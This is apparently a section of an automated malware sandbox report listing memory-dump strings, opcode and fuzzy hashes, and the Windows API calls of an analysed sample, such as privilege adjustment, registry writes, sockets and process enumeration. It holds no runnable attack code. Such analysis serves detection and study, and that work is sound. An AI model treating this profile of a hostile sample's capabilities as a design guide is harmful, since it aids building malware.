                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: A`_^
                                              • API String ID: 0-4224390668
                                              • Opcode ID: 43c31bebd154d258a9745688c16aefe5555c4110478ec9299522fc16e08bf8fb
                                              • Instruction ID: fd46c1bd24c4f44068b4546a842dca47e0fc5f158103280d15b1218ff1d93cff
                                              • Opcode Fuzzy Hash: 43c31bebd154d258a9745688c16aefe5555c4110478ec9299522fc16e08bf8fb
                                              • Instruction Fuzzy Hash: 51715817B5E5A256EE11F33D74B60E97FA0DF8233671410B7E0CC490A3ED48689E8A95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: jt)a
                                              • API String ID: 0-1490339538
                                              • Opcode ID: 01a768c8f5a6214335a37fc791f6d5e9b4e883f79d3865dc0784c151fd128d6b
                                              • Instruction ID: bb7e42752bb6b3c781ecb1c7b1d4b5e5bafd2044d8cfd4e1073a71974baf9e44
                                              • Opcode Fuzzy Hash: 01a768c8f5a6214335a37fc791f6d5e9b4e883f79d3865dc0784c151fd128d6b
                                              • Instruction Fuzzy Hash: C551E632B1CA4A8FEB48E76884663F9B7E1FF85710F44457AE04ED31D3DE28A8458781
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: j`
                                              • API String ID: 0-3204994738
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: ]s_H
                                              • API String ID: 0-196105811
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Executed Functions

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: >_?r
                                              • API String ID: 0-2961507119
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: r
                                              • API String ID: 0-1812594589
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • bind.WS2_32(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 0234294B
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: bind
                                              • String ID:
                                              • API String ID: 1187836755-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 02341123
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: AdjustPrivilegesToken
                                              • String ID:
                                              • API String ID: 2874748243-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtQuerySystemInformation.NTDLL ref: 02341355
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: InformationQuerySystem
                                              • String ID:
                                              • API String ID: 3562636166-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • bind.WS2_32(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 0234294B
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: bind
                                              • String ID:
                                              • API String ID: 1187836755-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 02341123
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: AdjustPrivilegesToken
                                              • String ID:
                                              • API String ID: 2874748243-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetSystemInfo.KERNELBASE(?), ref: 02340D98
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: InfoSystem
                                              • String ID:
                                              • API String ID: 31276548-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtQuerySystemInformation.NTDLL ref: 02341355
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: InformationQuerySystem
                                              • String ID:
                                              • API String ID: 3562636166-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: 0e$0e$0e
                                              • API String ID: 0-2797960476
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: :@:r$`5ar
                                              • API String ID: 0-3512261011
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: $>_?r
                                              • API String ID: 0-334426466
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: ne$r*+
                                              • API String ID: 0-3485995231
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: e$l_r
                                              • API String ID: 0-1812722675
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: $g^r
                                              • API String ID: 0-3653196314
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DnsQuery_A.DNSAPI(?,00000E2C,?,?), ref: 02341556
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: Query_
                                              • String ID:
                                              • API String ID: 428220571-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RegQueryValueExA.KERNELBASE(?,00000E2C), ref: 0234045E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: QueryValue
                                              • String ID:
                                              • API String ID: 3660427363-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 02340899
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • FormatMessageW.KERNELBASE(?,00000E2C,?,?), ref: 02342C35
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: FormatMessage
                                              • String ID:
                                              • API String ID: 1306739567-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetProcessTimes.KERNELBASE(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 023423FD
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: ProcessTimes
                                              • String ID:
                                              • API String ID: 1995159646-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateMutexW.KERNELBASE(?,?), ref: 0234019D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: CreateMutex
                                              • String ID:
                                              • API String ID: 1964310414-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: FileView
                                              • String ID:
                                              • API String ID: 3314676101-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RegQueryValueExW.KERNELBASE(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 0234055C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: QueryValue
                                              • String ID:
                                              • API String ID: 3660427363-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RegOpenKeyExA.KERNELBASE(?,00000E2C), ref: 02340353
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • OpenFileMappingW.KERNELBASE(?,?), ref: 02341E9D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: FileMappingOpen
                                              • String ID:
                                              • API String ID: 1680863896-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetFileType.KERNELBASE(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 02340985
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: FileType
                                              • String ID:
                                              • API String ID: 3081899298-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • WSASocketW.WS2_32(?,?,?,?,?), ref: 0234160E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: Socket
                                              • String ID:
                                              • API String ID: 38366605-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 02340899
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DeleteFileA.KERNELBASE(?,00000E2C), ref: 02340CEF
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RegSetValueExW.KERNELBASE(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 02340C10
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: Value
                                              • String ID:
                                              • API String ID: 3702945584-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • setsockopt.WS2_32(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 02340A51
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: setsockopt
                                              • String ID:
                                              • API String ID: 3981526788-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RegQueryValueExA.KERNELBASE(?,00000E2C), ref: 0234045E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: QueryValue
                                              • String ID:
                                              • API String ID: 3660427363-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateMutexW.KERNELBASE(?,?), ref: 0234019D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: CreateMutex
                                              • String ID:
                                              • API String ID: 1964310414-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,?), ref: 0234079F
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: CreateDirectory
                                              • String ID:
                                              • API String ID: 4241100979-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CopyFileW.KERNELBASE(?,?,?), ref: 02340B1E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: CopyFile
                                              • String ID:
                                              • API String ID: 1304948518-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • OpenFileMappingW.KERNELBASE(?,?), ref: 02341E9D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: FileMappingOpen
                                              • String ID:
                                              • API String ID: 1680863896-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 023411DC
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: FileView
                                              • String ID:
                                              • API String ID: 3314676101-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • K32EnumProcesses.KERNEL32(?,?,?,9CB165A5,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 02341296
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: EnumProcesses
                                              • String ID:
                                              • API String ID: 84517404-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • WSASocketW.WS2_32(?,?,?,?,?), ref: 0234160E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: Socket
                                              • String ID:
                                              • API String ID: 38366605-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 02340264
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RegSetValueExW.KERNELBASE(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 02340C10
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: Value
                                              • String ID:
                                              • API String ID: 3702945584-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RegQueryValueExW.KERNELBASE(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 0234055C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: QueryValue
                                              • String ID:
                                              • API String ID: 3660427363-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 02340F06
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetProcessTimes.KERNELBASE(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 023423FD
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: ProcessTimes
                                              • String ID:
                                              • API String ID: 1995159646-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DeleteFileA.KERNELBASE(?,00000E2C), ref: 02340CEF
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • setsockopt.WS2_32(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 02340A51
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: setsockopt
                                              • String ID:
                                              • API String ID: 3981526788-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RegOpenKeyExA.KERNELBASE(?,00000E2C), ref: 02340353
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetSystemInfo.KERNELBASE(?), ref: 02340D98
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: InfoSystem
                                              • String ID:
                                              • API String ID: 31276548-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 02340F06
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CopyFileW.KERNELBASE(?,?,?), ref: 02340B1E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: CopyFile
                                              • String ID:
                                              • API String ID: 1304948518-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetFileType.KERNELBASE(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 02340985
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: FileType
                                              • String ID:
                                              • API String ID: 3081899298-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,?), ref: 0234079F
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: CreateDirectory
                                              • String ID:
                                              • API String ID: 4241100979-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • K32EnumProcesses.KERNEL32(?,?,?,9CB165A5,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 02341296
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: EnumProcesses
                                              • String ID:
                                              • API String ID: 84517404-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • FormatMessageW.KERNELBASE(?,00000E2C,?,?), ref: 02342C35
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: FormatMessage
                                              • String ID:
                                              • API String ID: 1306739567-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 02340264
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DnsQuery_A.DNSAPI(?,00000E2C,?,?), ref: 02341556
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: Query_
                                              • String ID:
                                              • API String ID: 428220571-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 023411DC
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: }e
                                              • API String ID: 0-1615138206
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: $g^r
                                              • API String ID: 0-3653196314
                                              • Opcode ID: 9ddadc25e32a1c1e56e235930396b0695289a5ecda64f233f0538461ff681faa
                                              • Instruction ID: 2b96a3f936d18aa3b7f23355b599bf0f494213a63e7892e76fde8d6c91f34bd2
                                              • Opcode Fuzzy Hash: 9ddadc25e32a1c1e56e235930396b0695289a5ecda64f233f0538461ff681faa
                                              • Instruction Fuzzy Hash: CB510834A01215CFDB54DFA4C894B9CBBB2BF48304F9041EAD40AAB369CB759D85CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: }e
                                              • API String ID: 0-1615138206
                                              • Opcode ID: 4770e8290ad75477739bf31685747d09d9c86458cb7f48f94d2003161bb86f8f
                                              • Instruction ID: 895f4087e013a9c2593a3384156b9d20926cb07ebd0bac9e53d0fe95c0ca5435
                                              • Opcode Fuzzy Hash: 4770e8290ad75477739bf31685747d09d9c86458cb7f48f94d2003161bb86f8f
                                              • Instruction Fuzzy Hash: D9414730614201CBDB04AB78FC1956D3BA7AF84717F949529F803DB274DFB04E429B92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: r*+
                                              • API String ID: 0-3221063712
                                              • Opcode ID: 6f143dbc9ec64d6677e2ffd28d39555ffe3e227cb51c6162e22946106649fa7a
                                              • Instruction ID: da5e777617627ae78ba48957086cd56aa3ff4c5616e961fbe1295a6ba62e8269
                                              • Opcode Fuzzy Hash: 6f143dbc9ec64d6677e2ffd28d39555ffe3e227cb51c6162e22946106649fa7a
                                              • Instruction Fuzzy Hash: 7F413570E20209CFDF58DBA4C2456AEBBF1FB44304F9084AAD543A72A8DBB55A41DF52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 919d09333b600ca0a479323206b3e8d9cab972fcc4bcb98902a9d0df9f0ab96f
                                              • Instruction ID: 34a333e914e780a0d70b4384d6396500273db739074c78e3fb34cc408ccf9c39
                                              • Opcode Fuzzy Hash: 919d09333b600ca0a479323206b3e8d9cab972fcc4bcb98902a9d0df9f0ab96f
                                              • Instruction Fuzzy Hash: 5C31CF30A10341CBCB04AB38E52427C3FA6EF85309B94866DE5078F359DFBA9C46CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: $le
                                              • API String ID: 0-882214482
                                              • Opcode ID: 13f99d4bc594c905d5360253c92946c78d241121f80796f1c08311058a511d86
                                              • Instruction ID: 7dc94c34f500ea345db2f83d388746866e28b62d5355f288ac0c4df5de384272
                                              • Opcode Fuzzy Hash: 13f99d4bc594c905d5360253c92946c78d241121f80796f1c08311058a511d86
                                              • Instruction Fuzzy Hash: 8F313A3051D3C28FCB429B74C8654587FF2AE46205B9989DFE4C2CF1A7D6B9484ACB53
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: Hu_r
                                              • API String ID: 0-2935379198
                                              • Opcode ID: 90d1874e1ae272d8ca23e5e229d0e34577433584b7edbf657be24dfdfc574e33
                                              • Instruction ID: 8e4f65299f089ac519afd5e7ca8b9e04fa3b4a8743e982d672b232f50b3ba093
                                              • Opcode Fuzzy Hash: 90d1874e1ae272d8ca23e5e229d0e34577433584b7edbf657be24dfdfc574e33
                                              • Instruction Fuzzy Hash: EAF0F43032C2508BCB506A6C9C6077D7F969BCA6207A8426EF516CF2DACD614C1583A3
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: Hu_r
                                              • API String ID: 0-2935379198
                                              • Opcode ID: 9f330445eb5dbb9c0c476329fa0b4332eb0106c1a48b30c54f469c820a81a38b
                                              • Instruction ID: 8fb18ff055c2098f93dd3feccc86a23f363dd0eedd2803767aabbfa093ba48f0
                                              • Opcode Fuzzy Hash: 9f330445eb5dbb9c0c476329fa0b4332eb0106c1a48b30c54f469c820a81a38b
                                              • Instruction Fuzzy Hash: 6AF0F92135825057CB806ABC685056D6FA6ABC26307A4422AF90ACF2C9DE915C0683A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
